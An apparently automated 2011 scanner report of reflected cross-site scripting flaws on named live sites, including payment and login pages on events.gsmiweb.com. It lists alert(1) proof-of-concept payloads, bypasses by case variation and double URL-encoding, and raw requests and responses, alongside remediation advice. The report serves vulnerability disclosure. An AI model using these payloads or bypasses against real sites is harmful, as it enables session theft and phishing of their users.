Report generated by XSS.CX at Thu Oct 06 16:15:30 CDT 2011.
Loading
XSS.CX Anti-Phishing Research consumes Public Domain URL's to identify Points of Contact within an organization that would be sent Private Reports of Vulnerabilities. Its suggest that any published materials for Contact Us include Security Researchers seeking to report vulnerabilities observe URL http://technet.microsoft.com/en-us/security/ff852094.aspx as Best Practices for a Company to use as a baseline transaction. XSS.Cx doesn't use DOMAIN WHOIS, RADB or ARIN CIDR Point of Contact Records.
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload e4c53<script>alert(1)</script>eaa7ecdfc6e was submitted in the cb parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 34f75'-alert(1)-'aa40d4a464b91be12 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the template request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5086'%3balert(1)//17ea04b255b was submitted in the template parameter. This input was echoed as a5086';alert(1)//17ea04b255b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Thu, 06 Oct 2011 20:44:20 GMT Server: Apache P3P: CP="NON DSP COR CUR OUR LEG PHY COM", policyref="http://as00.estara.com/w3c/p3p.xml" Expires: Wed, 11 Nov 1998 11:11:11 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Connection: close Content-Length: 10171 Content-Type: application/x-javascript
var wv_available = true; if (typeof(wv_available_vars) == 'undefined') wv_available_vars = new Array(); wv_available_vars['655713a5086';alert(1)//17ea04b255b'] = true;
var wv_vars=typeof(wv_vars)=="undefined"?new Array():wv_vars;wv_vars["ui_width"]="430";wv_vars["ui_height"]="378";wv_vars["ui_version"]="UI0001";wv_vars["ui_newwindow"]="yes";wv_vars["ui_ac ...[SNIP]...
The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 2ed73<script>alert(1)</script>ae10276bf2f was submitted in the c1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload fbb69<script>alert(1)</script>9bea01bd19b was submitted in the c2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 8ef87<script>alert(1)</script>10d5d76217d was submitted in the c3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 24d00<script>alert(1)</script>6b9fa82522c was submitted in the c4 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload fc9c2<script>alert(1)</script>4389bcfaf50 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload f0baa<script>alert(1)</script>288f8043760 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c226a%3balert(1)//1c1163e31d6 was submitted in the c parameter. This input was echoed as c226a;alert(1)//1c1163e31d6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the current_page request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8c15"><script>alert(1)</script>8bd02bd30b0 was submitted in the current_page parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c request parameter is copied into the HTML document as plain text between tags. The payload e354c<script>alert(1)</script>e54861813bc was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload b3e20<ScRiPt>alert(1)</ScRiPt>d25cec59757 was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
The value of the plc request parameter is copied into the HTML document as plain text between tags. The payload 9c64f<ScRiPt>alert(1)</ScRiPt>40d48d42282 was submitted in the plc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
The value of the zi request parameter is copied into the HTML document as plain text between tags. The payload e975f<ScRiPt>alert(1)</ScRiPt>251321d27d3 was submitted in the zi parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
1.16. http://clients.360i.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://clients.360i.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e8d4"><script>alert(1)</script>a8f15f697ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the u request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 771a6'%3balert(1)//ec4dc3aaa84 was submitted in the u parameter. This input was echoed as 771a6';alert(1)//ec4dc3aaa84 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the eventid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a09b0"%3balert(1)//69748930215 was submitted in the eventid parameter. This input was echoed as a09b0";alert(1)//69748930215 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /creditcard_process.php?eventid=62a09b0"%3balert(1)//69748930215 HTTP/1.1 Referer: https://events.gsmiweb.com/pastevents.php Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 Cache-Control: no-cache Host: events.gsmiweb.com Cookie: PHPSESSID=gr5t0m05avfcnfaqun5doi7ir4 Accept-Encoding: gzip, deflate
Response (redirected)
HTTP/1.1 200 OK Date: Thu, 06 Oct 2011 20:45:11 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 6959 Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html> <head> <link rel="stylesheet" href="css/default.advanced.css" type="tex ...[SNIP]... ert("Enter the Username"); return false; } if(document.getElementById("psw").value=='') { alert("Enter the Password"); return false; }
The value of the eventid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c556%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebbef28f03fc was submitted in the eventid parameter. This input was echoed as 4c556"><script>alert(1)</script>bbef28f03fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the eventid request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /creditcard_process.php?eventid=624c556%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebbef28f03fc HTTP/1.1 Referer: https://events.gsmiweb.com/pastevents.php Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 Cache-Control: no-cache Host: events.gsmiweb.com Cookie: PHPSESSID=gr5t0m05avfcnfaqun5doi7ir4 Accept-Encoding: gzip, deflate
Response (redirected)
HTTP/1.1 200 OK Date: Thu, 06 Oct 2011 20:45:08 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 6989 Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html> <head> <link rel="stylesheet" href="css/default.advanced.css" type="tex ...[SNIP]... <input type="hidden" name="eventid" id="eventid" value="624c556"><script>alert(1)</script>bbef28f03fc"> ...[SNIP]...
The value of the eventid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2186b"%3balert(1)//29ecd33ee2e was submitted in the eventid parameter. This input was echoed as 2186b";alert(1)//29ecd33ee2e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
POST /member_login.php?eventid=2186b"%3balert(1)//29ecd33ee2e HTTP/1.1 Referer: https://events.gsmiweb.com/member_login.php?eventid= Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 Cache-Control: no-cache Content-Type: multipart/form-data; boundary=508f7787a8b34b47ac085041d2713f9f Host: events.gsmiweb.com Cookie: PHPSESSID=gr5t0m05avfcnfaqun5doi7ir4 Content-Length: 385 Expect: 100-continue Accept-Encoding: gzip, deflate
The value of the eventid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a26d"><script>alert(1)</script>3be25ad7ab0 was submitted in the eventid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
POST /member_login.php?eventid=5a26d"><script>alert(1)</script>3be25ad7ab0 HTTP/1.1 Referer: https://events.gsmiweb.com/member_login.php?eventid= Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 Cache-Control: no-cache Content-Type: multipart/form-data; boundary=508f7787a8b34b47ac085041d2713f9f Host: events.gsmiweb.com Cookie: PHPSESSID=gr5t0m05avfcnfaqun5doi7ir4 Content-Length: 385 Expect: 100-continue Accept-Encoding: gzip, deflate
The value of the monthyear request parameter is copied into the HTML document as plain text between tags. The payload 16900<script>alert(1)</script>9589fe881f was submitted in the monthyear parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pastevents.php?monthyear=November%20201016900<script>alert(1)</script>9589fe881f HTTP/1.1 Referer: https://events.gsmiweb.com/pastevents.php Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 Cache-Control: no-cache Host: events.gsmiweb.com Cookie: PHPSESSID=gr5t0m05avfcnfaqun5doi7ir4 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Thu, 06 Oct 2011 20:44:57 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 6464 Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html> <head> <link rel="stylesheet" href="css/default.advanced.css" type="tex ...[SNIP]... </a>November 201016900<script>alert(1)</script>9589fe881f</h2> ...[SNIP]...
The value of the monthyear request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6ea1"><script>alert(1)</script>33a545df4c was submitted in the monthyear parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pastevents.php?monthyear=November%202010b6ea1"><script>alert(1)</script>33a545df4c HTTP/1.1 Referer: https://events.gsmiweb.com/pastevents.php Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 Cache-Control: no-cache Host: events.gsmiweb.com Cookie: PHPSESSID=gr5t0m05avfcnfaqun5doi7ir4 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Thu, 06 Oct 2011 20:44:54 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 6468 Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html> <head> <link rel="stylesheet" href="css/default.advanced.css" type="tex ...[SNIP]... <a name="November 2010b6ea1"><script>alert(1)</script>33a545df4c"> ...[SNIP]...
1.24. https://events.gsmiweb.com/pastevents.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://events.gsmiweb.com
Path:
/pastevents.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5024a"><script>alert(1)</script>01ce7810ada was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pastevents.php?monthyear=November%20/5024a"><script>alert(1)</script>01ce7810ada2010 HTTP/1.1 Referer: https://events.gsmiweb.com/pastevents.php Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 Cache-Control: no-cache Host: events.gsmiweb.com Cookie: PHPSESSID=gr5t0m05avfcnfaqun5doi7ir4 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Thu, 06 Oct 2011 20:45:00 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 6472 Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html> <head> <link rel="stylesheet" href="css/default.advanced.css" type="tex ...[SNIP]... <a name="November /5024a"><script>alert(1)</script>01ce7810ada2010"> ...[SNIP]...
1.25. https://events.gsmiweb.com/pastevents.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://events.gsmiweb.com
Path:
/pastevents.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 55fd3<script>alert(1)</script>38869ccc481 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pastevents.php?monthyear=November%20/55fd3<script>alert(1)</script>38869ccc4812010 HTTP/1.1 Referer: https://events.gsmiweb.com/pastevents.php Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 Cache-Control: no-cache Host: events.gsmiweb.com Cookie: PHPSESSID=gr5t0m05avfcnfaqun5doi7ir4 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Thu, 06 Oct 2011 20:45:02 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 6468 Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html> <head> <link rel="stylesheet" href="css/default.advanced.css" type="tex ...[SNIP]... </a>November /55fd3<script>alert(1)</script>38869ccc4812010</h2> ...[SNIP]...
The value of the contactid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a9ee"><script>alert(1)</script>6230c787a34 was submitted in the contactid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /process_payment.php?contactid=5a9ee"><script>alert(1)</script>6230c787a34 HTTP/1.1 Referer: https://events.gsmiweb.com/searchsubscribe.php Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 Cache-Control: no-cache Host: events.gsmiweb.com Cookie: PHPSESSID=gr5t0m05avfcnfaqun5doi7ir4 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Thu, 06 Oct 2011 20:44:45 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 9910
INVALID_QUERY_FILTER_OPERATOR: Email,AccountId from Contact where Id='5a9ee"><script>alert(1)</script>6230c787a34' ^ ERROR at Row:1:Column:174 invalid ID field: 5a ...[SNIP]... <input type="hidden" name="contactid" id="contactid" value="5a9ee"><script>alert(1)</script>6230c787a34"> ...[SNIP]...
The value of the contactid request parameter is copied into the HTML document as plain text between tags. The payload 9c8ba<script>alert(1)</script>0708dd5fd30 was submitted in the contactid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /process_payment.php?contactid=9c8ba<script>alert(1)</script>0708dd5fd30 HTTP/1.1 Referer: https://events.gsmiweb.com/searchsubscribe.php Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 Cache-Control: no-cache Host: events.gsmiweb.com Cookie: PHPSESSID=gr5t0m05avfcnfaqun5doi7ir4 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Thu, 06 Oct 2011 20:44:50 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 9904
INVALID_QUERY_FILTER_OPERATOR: Email,AccountId from Contact where Id='9c8ba<script>alert(1)</script>0708dd5fd30' ^ ERROR at Row:1:Column:174 invalid ID field: 9c8ba<script> ...[SNIP]...
The value of the amountInDollars request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1ee8"><script>alert(1)</script>6c9e5934c07 was submitted in the amountInDollars parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the discountamount request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24f64"><script>alert(1)</script>573ef5a17a1c9aeac was submitted in the discountamount parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /subscribe.php?event_id=94&contact_fname=&contact_lname=&title=&event=Quality+Assurance+Masters+Training&eventid=94&company=&department=&address=&city=&state=&zip=&phone=&fax=&email=&conferenceval=2095.00%2c406&conference=&reset=reset&sncount=4&pakdis=&workshop=&priceconfid=0&priceworkshopid=&workshop_alphabet=&discountamount=024f64"><script>alert(1)</script>573ef5a17a1c9aeac&discountcode=&balance_after_ct=&coupon_amount=&percentagecal=&amount=&amountInDollars=&displaySymbol=%24&symbolToDisplay=USD&vatpercentage=¤cyRate=&total=&avail_balance=&coupon=&payment_method=cc&cc_type=&card_num=&exp_month=10&exp_year=11 HTTP/1.1 Referer: https://events.gsmiweb.com/subscribe.php?event_id=94 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 Cache-Control: no-cache Host: events.gsmiweb.com Cookie: PHPSESSID=gr5t0m05avfcnfaqun5doi7ir4 Expect: 100-continue Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Thu, 06 Oct 2011 20:46:16 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 39277
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <meta http-equiv="content-type" content="text/html;charset=ISO- ...[SNIP]... <input name="discountamount" type="hidden" id="discountamount" value="024f64"><script>alert(1)</script>573ef5a17a1c9aeac"> ...[SNIP]...
The value of the priceconfid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9e37"><script>alert(1)</script>1fb11249e6bac6af0 was submitted in the priceconfid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /subscribe.php?event_id=94&contact_fname=&contact_lname=&title=&event=Quality+Assurance+Masters+Training&eventid=94&company=&department=&address=&city=&state=&zip=&phone=&fax=&email=&conferenceval=2095.00%2c406&conference=&reset=reset&sncount=4&pakdis=&workshop=&priceconfid=0a9e37"><script>alert(1)</script>1fb11249e6bac6af0&priceworkshopid=&workshop_alphabet=&discountamount=0&discountcode=&balance_after_ct=&coupon_amount=&percentagecal=&amount=&amountInDollars=&displaySymbol=%24&symbolToDisplay=USD&vatpercentage=¤cyRate=&total=&avail_balance=&coupon=&payment_method=cc&cc_type=&card_num=&exp_month=10&exp_year=11 HTTP/1.1 Referer: https://events.gsmiweb.com/subscribe.php?event_id=94 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 Cache-Control: no-cache Host: events.gsmiweb.com Cookie: PHPSESSID=gr5t0m05avfcnfaqun5doi7ir4 Expect: 100-continue Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Thu, 06 Oct 2011 20:46:09 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 39277
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <meta http-equiv="content-type" content="text/html;charset=ISO- ...[SNIP]... <input name="priceconfid" type="hidden" id="priceconfid" value="0a9e37"><script>alert(1)</script>1fb11249e6bac6af0"> ...[SNIP]...
